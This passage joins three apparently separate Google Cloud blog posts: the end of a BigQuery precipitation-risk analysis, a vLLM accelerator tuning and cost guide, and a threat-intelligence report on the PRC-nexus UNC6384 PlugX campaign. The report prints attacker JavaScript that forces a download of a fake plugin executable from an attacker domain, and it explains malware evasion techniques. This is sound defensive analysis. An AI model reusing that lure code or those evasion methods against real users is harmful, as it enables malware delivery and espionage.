     AVG(yearly_max_1day_precip * 1e3) AS avg_yearly_max_1day_precip,
     STDDEV(yearly_max_1day_precip * 1e3) AS stddev_yearly_max_1day_precip
   GROUP BY county_id, epoch
-- Step 9: Calculate the return period precipitation values.
-- Applies the UDF to the calculated statistics for each return period.
|> CROSS JOIN ReturnPeriods rp
|> EXTEND
     CalculateReturnPeriod(rp.years, avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip) AS est_max_1day_precip
|> DROP avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip
-- Step 10: Pivot the data to create columns for each epoch and return period.
-- The first PIVOT transforms rows for 'e1' and 'e2' into columns for direct comparison.
|> PIVOT (ANY_VALUE(est_max_1day_precip) AS est_max_1day_precip FOR epoch IN ('e1', 'e2'))
-- The second PIVOT transforms rows for each return period (10, 25, etc.) into columns.
|> PIVOT (ANY_VALUE(est_max_1day_precip_e1) AS e1, ANY_VALUE(est_max_1day_precip_e2) AS e2 FOR years IN (10, 25, 50, 100, 500))
-- Step 11: Re-attach county names and geometries for the final output.
|> LEFT JOIN Counties ON county_id = Counties.id
-- Step 12: Calculate the final difference between the two epochs.
-- This creates the delta values that show the change in precipitation magnitude for each return period.
|> SELECT
     county,
     Counties.geometry,
     e2_10 - e1_10 AS est_10yr_max_1day_precip_delta,
     e2_25 - e1_25 AS est_25yr_max_1day_precip_delta,
     e2_50 - e1_50 AS est_50yr_max_1day_precip_delta,
     e2_100 - e1_100 AS est_100yr_max_1day_precip_delta,
     e2_500 - e1_500 AS est_500yr_max_1day_precip_delta
|> ORDER BY county
To provide quick results as a demonstration, the example query above filters for five populated counties; running the computation for all of Germany would take much longer. When running the analysis for many more geometries (areas of interest), you can break the analysis into two parts:
Calculate the historical time series of maximum daily precipitation for each county in Germany from 1980-2024 and save the resulting table.
Use these results to calculate and compare precipitation return periods for two distinct timeframes.
With the analysis complete, the results can be immediately rendered using the new Visualization feature in BigQuery Studio. This allows the insurance provider to:
Pinpoint high-risk zones: Visually identify clusters of counties with increasing extreme precipitation, for proactive risk mitigation and to optimize policy pricing.
Communicate insights: Share interactive maps with stakeholders, making complex risk assessments understandable at a glance.
Inform strategic decisions: This type of analysis is not limited to insurance. For example, a consumer packaged goods (CPG) company could use these insights to optimize warehouse and distribution center locations, situating them in areas with more stable climate conditions.
Running BigQuery analysis for changing extreme precipitation events in Germany and interactively exploring the results with the new Map visualization
This combination of Earth Engine, BigQuery, and integrated visualization helps businesses move beyond reactive measures, enabling data-driven foresight in a rapidly changing world.
The future of geospatial analysis is here
With the general availability of Earth Engine in BigQuery and the preview of map visualization, we’re helping data professionals across industries to unlock richer, more actionable insights from their geospatial data. From understanding climate risk for buildings in flood-prone areas to optimizing enterprise planning and supply chains, these tools are designed to power operational decision making, helping your business thrive in an increasingly data-driven landscape.
We are continuously working to expand the utility and accessibility of this new set of capabilities, including:
Growing catalog of datasets: Expect more datasets for both Earth Engine and BigQuery Sharing, allowing you to leverage analysis-ready datasets for individual or combined use with custom datasets.
Intelligent geospatial assistance: We envision a future where advanced AI and code generation capabilities will further streamline geospatial workflows. Stay tuned for more on this later this year!
Additional contributors include Hossein Sarshar, Ashish Narasimham, and Chenyang Li.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottom-up approach to determining the best accelerator for your use case and optimizing your vLLM configuration to achieve the best and most cost-effective results possible.
Note: This guide assumes that you are familiar with xPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel intimidating because each inference use case is unique. There is no a priori ideal setup from a cost/performance perspective; we can't say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed (the answers map directly onto the vLLM server flags shown in the example after this list):
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the xPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
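Taken together, these answers map onto vLLM's server flags roughly as follows. This is a sketch rather than a tuned configuration: flag names are per current vLLM releases, and the gpu-memory-utilization and tensor-parallel-size values shown here are placeholders that come out of the tuning process described later.
# Workload answers expressed as a vLLM server invocation (illustrative values).
vllm serve google/gemma-3-27b-it \
  --dtype bfloat16 \
  --max-model-len 2000 \
  --gpu-memory-utilization 0.95 \
  --tensor-parallel-size 1 \
  --enable-prefix-caching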
Selecting Accelerators (xPU)
We live in a world of resource scarcity! What does this mean for your use case? You could probably get the best possible latency and throughput by using the most up-to-date hardware, but as an engineer it makes no sense to do this when you can meet your requirements at a better price/performance point.
Identifying Candidate Accelerators
We can refer to our Accelerator-Optimized Machine Family of Google Cloud Instances to determine which accelerator-optimized instances are viable candidates.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the “Calculate Memory Requirements” section.
The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.
Accelerator-optimized Options
g2-standard-48
Provides 4 accelerators with 96 GB of GDDR6
TP = 4
a2-ultragpu-1g
Provides 1 accelerator with 80 GB of HBM
TP = 1
a3-highgpu-1g
Provides 1 accelerator with 80 GB of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory from our model weights, activations, and overhead plus the KV Cache memory.
model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
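As a rough back-of-the-envelope check of that figure, the components can be added up directly; the per-token KV-cache size below is an assumed estimate for this model, not an exact value.
# Rough minimum VRAM estimate for gemma-3-27b-it in BF16 at batch size 1.
PARAMS_B=27           # billions of parameters
BYTES_PER_PARAM=2     # BF16 weights
NON_TORCH_GB=1        # estimated non-torch overhead
ACTIVATION_GB=1       # assumed peak activation memory
KV_PER_TOKEN_MB=0.5   # assumed KV-cache footprint per token
MAX_SEQ_LEN=2000      # maximum total sequence length

echo "$PARAMS_B * $BYTES_PER_PARAM + $NON_TORCH_GB + $ACTIVATION_GB + ($KV_PER_TOKEN_MB * $MAX_SEQ_LEN / 1024)" | bc -l
# Prints ~56.98, i.e. roughly 57 GB.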
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking a large model apart across multiple accelerators (xPUs) so that the model can fit on the available hardware. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPUs because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM per chip respectively, as mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while a single-accelerator instance would not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates, it is time to see the best level of performance we can achieve across each potential setup. We will only cover benchmarking and tuning for an anonymized accelerator-optimized instance and Trillium (v6e) in this section, but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
Accelerator-optimized Machine Type
In your project, open the Cloud Shell and enter the following command to launch your chosen instance and its corresponding accelerator and accelerator count. Be sure to update your project ID accordingly and select a zone that supports your machine type for which you have quota.
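A minimal sketch of such a launch for the a2-ultragpu-1g candidate follows, with placeholder project, zone, and image values; substitute a GPU-ready Deep Learning VM image family (or your preferred image) and your own identifiers.
# Launch an a2-ultragpu-1g instance (one 80 GB accelerator) for benchmarking.
# Pick a GPU-ready Deep Learning VM image family for --image-family.
gcloud compute instances create vllm-benchmark-vm \
  --project=YOUR_PROJECT_ID \
  --zone=us-central1-a \
  --machine-type=a2-ultragpu-1g \
  --image-family=DEEP_LEARNING_IMAGE_FAMILY \
  --image-project=deeplearning-platform-release \
  --boot-disk-size=500GB \
  --maintenance-policy=TERMINATE

# SSH in once the instance is running.
gcloud compute ssh vllm-benchmark-vm --zone=us-central1-a --project=YOUR_PROJECT_ID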
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail — if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
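A minimal sketch of that step, assuming the upstream vllm/vllm-openai image and a placeholder Hugging Face token:
# Pull the latest vLLM image and open an interactive shell inside it.
docker pull vllm/vllm-openai:latest

docker run -it --rm --gpus all \
  -e HF_TOKEN=YOUR_HF_TOKEN \
  --entrypoint /bin/bash \
  vllm/vllm-openai:latest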
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh that we need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
# navigate to correct directory
cd benchmarks/auto_tune

# update the auto_tune.sh script - use your preferred script editor
nano auto_tune.sh
In the auto_tune.sh script, you will need to make the following updates:
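The exact variable names can differ between vLLM releases, but the values we derived earlier map onto the script roughly as follows (a sketch, not a verbatim copy of the file):
# Inside auto_tune.sh: point the tuner at our model and workload profile.
MODEL="google/gemma-3-27b-it"
TP=1                                      # single 80 GB accelerator
INPUT_LEN=1500                            # average input tokens per request
OUTPUT_LEN=200                            # average output tokens per request
MIN_CACHE_HIT_PCT=50                      # estimated prefix cache hit rate
MAX_LATENCY_ALLOWED_MS=10000              # P99 end-to-end latency budget
NUM_SEQS_LIST="128 256"                   # candidate max_num_seqs values to sweep
NUM_BATCHED_TOKENS_LIST="512 1024 2048"   # candidate max_num_batched_tokens values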
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow-up server, resulting in what appears to be a hang. If either happens, edit auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than 0.98.
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In our result.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute TPU benchmarking and the previously described process.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
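A minimal sketch of the queued-resource request, with hypothetical resource names; verify the zone and runtime version against current TPU documentation before running it.
# Illustrative values; substitute your own project, zone, and names.
export PROJECT=YOUR_PROJECT_ID
export ZONE=us-east5-b
export QR_NAME=vllm-v6e-qr
export NODE_NAME=vllm-v6e-node

# Request a v6e-4 TPU VM through Queued Resources.
gcloud compute tpus queued-resources create $QR_NAME \
  --node-id $NODE_NAME \
  --project $PROJECT \
  --zone $ZONE \
  --accelerator-type v6e-4 \
  --runtime-version v2-alpha-tpuv6e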
# Monitor creation
gcloud compute tpus queued-resources list --zone $ZONE --project $PROJECT
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
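For example, assuming the node name used in the sketch above:
gcloud compute tpus tpu-vm ssh $NODE_NAME --zone $ZONE --project $PROJECT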
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with our other machine type.
# Head to the main working directory
cd benchmarks/auto_tune/

# install required library
apt-get install bc

# Provide HF_TOKEN
export HF_TOKEN=XXXXXXXXXXXXXXXXXXXXX

# update auto_tune.sh with your preferred script editor and launch auto_tuner
nano auto_tune.sh
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
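The main change from the earlier configuration is the tensor-parallel size, which now spans all four v6e chips; the workload values carry over (again, variable names may vary slightly between vLLM versions).
# Inside auto_tune.sh: same workload profile, but TP spans the full v6e-4 slice.
MODEL="google/gemma-3-27b-it"
TP=4
INPUT_LEN=1500
OUTPUT_LEN=200
MIN_CACHE_HIT_PCT=50
MAX_LATENCY_ALLOWED_MS=10000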
As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:
start_server() {

...

  for i in {1..60}; do
    RESPONSE=$(curl -s -X GET "http://0.0.0.0:8004/health" -w "%{http_code}" -o /dev/stdout)
    STATUS_CODE=$(echo "$RESPONSE" | tail -n 1)
    if [[ "$STATUS_CODE" -eq 200 ]]; then
      server_started=1
      break
    else
      sleep 10  # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONG
    fi
  done
  if (( ! server_started )); then
    echo "server did not start within 10 minutes. Please check server log at $vllm_log".
    return 1
  else
    return 0
  fi
}
The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/$TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the anonymized candidate and the TPU v6e.
Anonymized Accelerator-optimized Candidate
Measured Throughput: The benchmark showed a single vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is 100 req/s ÷ 4.17 req/s per instance ≈ 23.98 instances.
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for our anonymized machine type in us-central1 was approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing for simple cost figures; this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster: 100 req/s ÷ 5.63 req/s per instance ≈ 17.76 instances.
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
Metric | Anonymized Candidate | TPU (v6e-4)
Throughput per Instance | 4.17 req/s | 5.63 req/s
Instances Needed (100 req/s) | 24 | 18
Spot Instance Cost Per Hour | $2.25 / hour | $0.56 x 4 chips = $2.24 / hour
Spot Cost Total | $54.00 / hour | $40.32 / hour
Total Monthly Cost (730h) | ~ $39,400 | ~ $29,400
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than our accelerator-optimized instance, but it does so at a reduced cost. This translates to massive savings at higher scales.
Looking at performance per dollar, the advantage is clear: the v6e-4 configuration delivers roughly 2.5 req/s per dollar-hour (5.63 ÷ $2.24), versus about 1.9 req/s per dollar-hour (4.17 ÷ $2.25) for the anonymized candidate, or about 35% more performance for every dollar spent, making it the superior, efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep the following in mind when sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – the anonymized candidate could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example; if we searched a larger space, we might have found a configuration with even greater cost-savings potential.
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
In March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the PRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG assesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People’s Republic of China (PRC).
The campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN. This ultimately led to the in-memory deployment of the backdoor SOGU.SEC (also known as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing certificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.
Google is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all Gmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified domains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google Security Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this activity in their environments.
Webinar: Defending Against Sophisticated and Evolving PRC-Nexus Espionage Campaigns. Register now: https://www.brighttalk.com/webcast/7451/651182?utm_source=blog
Overview
This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat actor’s operational capabilities. We examine how the malware is delivered, how the threat actor utilized social engineering and evasion techniques, and technical aspects of the multi-stage malware payloads.
In this campaign, the malware payloads were disguised as either software or plugin updates and delivered through UNC6384 infrastructure using AitM and social engineering tactics. A high level overview of the attack chain:
The target’s web browser tests if the internet connection is behind a captive portal;
An AitM redirects the browser to a threat actor controlled website;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves an MSI package from the same website;
Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.
Figure 1: Attack chain diagram
Malware Delivery: Captive Portal Hijack
GTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe Plugin update to targeted entities. A captive portal is a network setup that directs users to a specific webpage, usually a login or splash page, before granting internet access. This functionality is intentionally built into all web browsers. The Chrome browser performs an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to enable this redirect mechanism.
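You can observe this probe directly; on a clean connection the request below returns an empty 204 response, while a captive portal (or, in this campaign, the AitM) answers with a redirect to its own page:
# Chrome's captive-portal probe: expect "HTTP/1.1 204 No Content" on a clean connection.
curl -si http://www.gstatic.com/generate_204 | head -n 1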
While “gstatic.com” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to the threat actor’s landing webpage and subsequent malware delivery, indicating an AitM attack. We assess the AitM was facilitated through compromised edge devices on the target networks. However, GTIG did not observe the attack vector used to compromise the edge devices.
Figure 2: Captive portal redirect chain
Fake Plugin Update
After being redirected, the threat actor attempts to deceive the target into believing that a software update is needed, and to download the malware disguised as a “plugin update”. The threat actor used multiple social engineering techniques to form a cohesive and credible update theme.
The landing webpage resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. The use of HTTPS offers several advantages for social engineering and malware delivery. Browser warning messages, such as “Not Secure” and “Your connection is not private”, will not be displayed to the target, and the connection to the website is encrypted, making it more difficult for network-based defenses to inspect and detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a Certificate Authority.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R10
Validity
Not Before: May 17 16:58:11 2025 GMT
Not After : Aug 15 16:58:10 2025 GMT
Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Figure 3: Website TLS certificate
The initial landing page is completely blank with a yellow bar across the top and a button that reads “Install Missing Plugins…”. If this technique successfully deceives the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.
Figure 4: Malware landing page
In the background, Javascript code is loaded from a script file named "style3.js" hosted on the same domain as the HTML page. When the target clicks the install button, "myFunction", which is located in the loaded script, is executed.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https[:]//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
Figure 5: Javascript from AdobePlugins.html
Inside of “myFunction” another image is loaded to display as the background image on the webpage. The browser window location is also set to the URL of an executable, again hosted on the same domain.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https[:]//mediareleaseupdates[.]com/AdobePlugins.exe";
}
Figure 6: Javascript from style3.js
This triggers the automatic download of “AdobePlugins.exe” and a new background image to be displayed on the webpage. The image shows instructions for how to execute the downloaded binary and bypass potential Windows security protections.
Figure 7: Malware landing page post-download
When the downloaded executable is run, the fake install prompt seen in the above screenshot for “STEP 2” is displayed on screen, along with “Install” and “Cancel” options. However, the SOGU.SEC payload is likely already running on the target device, as neither button triggers any action relevant to the malware.
Malware Analysis
Upon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a novel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC backdoor, which then establishes communication with the threat actor’s command and control (C2) server.
Digitally Signed Downloader: STATICPLUGIN
The downloaded “AdobePlugins.exe” file is a first stage malware downloader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of being able to bypass endpoint security protections that typically trust files with valid digital signatures. This gives the malware false legitimacy, making it harder for both users and automated defenses to detect.
The binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in use. While the signing certificate expired on July 14th, 2025 and is no longer valid, it may be easy for the threat actor to re-sign new versions of STATICPLUGIN with similarly obtained certificates.
Figure 8: Downloader with valid digital signature
STATICPLUGIN implements a custom TForm which is designed to masquerade as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from “https[:]//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. After installation of these files, CANONSTAGER is executed via DLL side-loading.
Certificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd
Our investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin Times Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in use by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.
GTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not attribute these other campaigns to UNC6384, they have multiple similarities and TTP overlaps with this UNC6384 campaign, in addition to using the same code signing certificates. Shared characteristics include:
Delivery through web-based redirects
Downloader first stage, sometimes packaged in an archive.
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate applications or updates
Targeting in Southeast Asia
It remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a victim with compromised code signing material. However, they may also be a willing participant or front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber operations.
Malicious Launcher: CANONSTAGER
Once CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window procedures, message queues, and callback functions to execute the final payload.
API Hashing and Thread Local Storage
Thread Local Storage (TLS) is intended to provide each thread in a multi-threaded application its own private data storage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API hashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array.
In short, the API hashing hides which Windows APIs are being used, while the TLS array provides a stealthy location to store the resolved function addresses. Use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.
Below is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryW function address.
Resolve the GetCurrentDirectoryW hash (0x6501CBE1)
Get the location of the TLS array from the Thread Information Block (TIB)
Move the resolved function address into offset 0x8 of the TLS array
Figure 9: Example of storing function addresses in TLS array
Indirect Code Execution
CANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly using the Windows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the malware and raising alerts. It also obscures the malware's control flow by "hiding" its code inside of the window procedure and triggering execution asynchronously. At a high level, CANONSTAGER:
Creates a hidden window registered with a custom window procedure;
Enters a message loop to receive and dispatch messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives the WM_SHOWWINDOW message; then
Executes SOGU.SEC in-memory with an EnumSystemGeoID callback.
Figure 10: Overview of CANONSTAGER execution using Windows message queue
Window Procedure
On a Windows system, every window class has an associated window procedure. The procedure allows programmers to define a custom function to process messages sent to the specified window class.
CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure for processing messages. Additionally, the window is created with a height and width of zero to remain hidden on the screen.
Inside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and launches the SOGU.SEC payload. For any message type other than 0x0018 (or 0x2 to ExitProcess), the window procedure calls the default handler (DefWindowProc), ignoring the message.
Message Queue
Windows applications use Message Queues for asynchronous communication. Both user applications and the Windows system can post messages to Message Queues. When a message is posted to an application window, the system calls the associated window procedure to process the message.
